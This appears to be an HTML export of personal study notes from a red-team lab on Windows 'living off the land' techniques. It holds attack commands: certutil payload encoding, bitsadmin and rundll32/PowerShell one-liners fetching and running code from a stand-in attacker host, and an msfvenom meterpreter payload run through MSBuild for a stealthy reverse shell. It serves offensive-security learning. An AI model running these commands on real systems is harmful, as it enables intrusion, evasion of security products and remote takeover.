<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../style.css">
    <base target="_parent">
    <title data-trilium-title>Live off the land</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>Live off the land</h1>

      <div class="ck-content">
        <ul>
          <li><span style="background-color:transparent">Reconnaissance</span>

          </li>
          <li><span style="background-color:transparent">Files operations</span>

          </li>
          <li><span style="background-color:transparent">Arbitrary code execution</span>

          </li>
          <li><span style="background-color:transparent">Lateral movement</span>

          </li>
          <li><span style="background-color:transparent">Security product bypass</span>

          </li>
        </ul>
         <h2>Windows file transfer</h2>

        <p>to transfer a file from windows when you have creds and gui connection,
          right click on the file/folder and "give access to"→"specific people" and
          in dropdown select everyone and then ok, this will start a smb server from
          where you can connect with creds and download files with smbclient.</p>
         <h2><span style="background-color:transparent">LOLBAS</span></h2>

        <p>if we want to look for a specific function, we require providing a 
          <span
          style="background-color:rgba(135,131,120,0.15);color:rgb(235,87,87)">/</span> before the function name. For example, if we are looking for
            all execute functions, we should use <span style="background-color:rgba(135,131,120,0.15);color:rgb(235,87,87)">/execute</span>. Similarly,
            in order to look based on types, we should use the <span style="background-color:rgba(135,131,120,0.15);color:rgb(235,87,87)">#</span> symbol
            followed by the type name. The following are the types included in the
            project:</p>
        <ul>
          <li>Script</li>
          <li>Binary</li>
          <li>Libraries</li>
          <li>OtherMSBinaries</li>
        </ul><pre><code class="language-text-plain">certutil -encode payload.exe Encoded-payload.txt</code></pre>

         <h2>BITSAdmin</h2>

        <p>The <span style="background-color:rgba(135,131,120,0.15);color:rgb(235,87,87)">bitsadmin</span> tool is
          a system administrator utility that can be used to create, download or
          upload Background Intelligent Transfer Service (BITS) jobs and check their
          progress. <a href="https://docs.microsoft.com/en-us/windows/win32/bits/background-intelligent-transfer-service-portal">BITS </a>is
          a low-bandwidth and asynchronous method to download and upload files from
          HTTP webservers and SMB servers. Additional information about the 
          <span
          style="background-color:rgba(135,131,120,0.15);color:rgb(235,87,87)">bitsadmin</span> tool can be found at <a href="https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin">Microsoft Docs</a>.
            Download files with bitsadmin</p><pre><code class="language-text-plain">bitsadmin.exe /transfer /Download /priority Foreground http://Attacker_IP/payload.exe c:\Users\thm\Desktop\payload.exe</code></pre>

         <h2>findstr</h2>

        <p>Download files from smb with findstr:</p><pre><code class="language-text-plain">findstr /V dummystring \\MachineName\ShareFolder\test.exe &gt; c:\Windows\Temp\test.exe	</code></pre>

        <p>In order to create a child process of <span style="background-color:rgba(135,131,120,0.15);color:rgb(235,87,87)">explorer.exe</span> parent,
          we can execute the following command:</p>
        <p> </p><pre><code class="language-text-plain">explorer.exe /root,"C:\Windows\System32\calc.exe"</code></pre>

         <h2>WMIC</h2>

        <p>Windows Management Instrumentation (WMIC) is a Windows command-line utility
          that manages Windows components. People found that WMIC is also used to
          execute binaries for evading defensive measures. <span style="color:rgb(14,16,26)">The MITRE ATT&amp;CK framework</span> refers
          to this technique as Signed Binary Proxy Execution (<a href="https://attack.mitre.org/techniques/T1218/">T1218</a>

          <span
          style="color:rgb(0,0,0)">)</span>
        </p><pre><code class="language-text-plain">wmic.exe process call create calc   </code></pre>

         <h2>Rundll32</h2>

        <p>Rundll32 is a Microsoft built-in tool that loads and runs Dynamic Link
          Library <span style="background-color:rgba(135,131,120,0.15);color:rgb(235,87,87)">DLL</span> files
          within the operating system. A red team can abuse and leverage  <span style="background-color:rgba(135,131,120,0.15);color:rgb(235,87,87)">rundll32.exe</span> to
          run arbitrary payloads and execute JavaScript and PowerShell scripts. 
          <span
          style="color:rgb(14,16,26)">The MITRE </span>ATT&amp;CK framework identifies this as <strong>Signed Binary Proxy Execution: Rundll32</strong> and
            refers to it as <a href="https://attack.mitre.org/techniques/T1218/011/">T1218</a>.</p><pre><code class="language-text-plain">rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");</code></pre>

        <p>we used the rundll32.exe binary that embeds a JavaScript component, eval(),
          to execute the calc.exe binary, a Microsoft calculator.</p>
        <p>The following command runs a JavaScript that executes a PowerShell script
          to download from a remote website using <span style="background-color:rgba(135,131,120,0.15);color:rgb(235,87,87)">rundll32.exe</span>.</p><pre><code class="language-text-plain">rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://AttackBox_IP/script.ps1');");</code></pre>

         <h2>PowerLessShell</h2>

        <p>PowerLessShell is a Python-based tool that generates malicious code to
          run on a target machine without showing an instance of the PowerShell process.
          PowerLessShell relies on abusing the Microsoft Build Engine (MSBuild),
          a platform for building Windows applications, to execute remote code.</p><pre><code class="language-text-plain">msfvenom -p windows/meterpreter/reverse_winhttps LHOST=AttackBox_IP LPORT=4443 -f psh-reflection &gt; liv0ff.ps1</code></pre><pre><code class="language-text-plain">python2 PowerLessShell.py -type powershell -source /tmp/liv0ff.ps1 -output liv0ff.csproj</code></pre><pre><code class="language-text-plain">C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe c:\Users\thm\Desktop\liv0ff.csproj</code></pre><pre><code class="language-text-plain">C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe c:\Users\thm\Desktop\liv0ff.csproj</code></pre>

        <p>Once we run the MSBuild command, wait a couple of seconds till we receive
          a reverse shell. Note that there will be no <span style="background-color:rgba(135,131,120,0.15);color:rgb(235,87,87)">powershell.exe</span> process
          is running.</p>
        <p> </p>
        <p> </p>
        <p> </p>
      </div>
    </div>
  </body>

</html>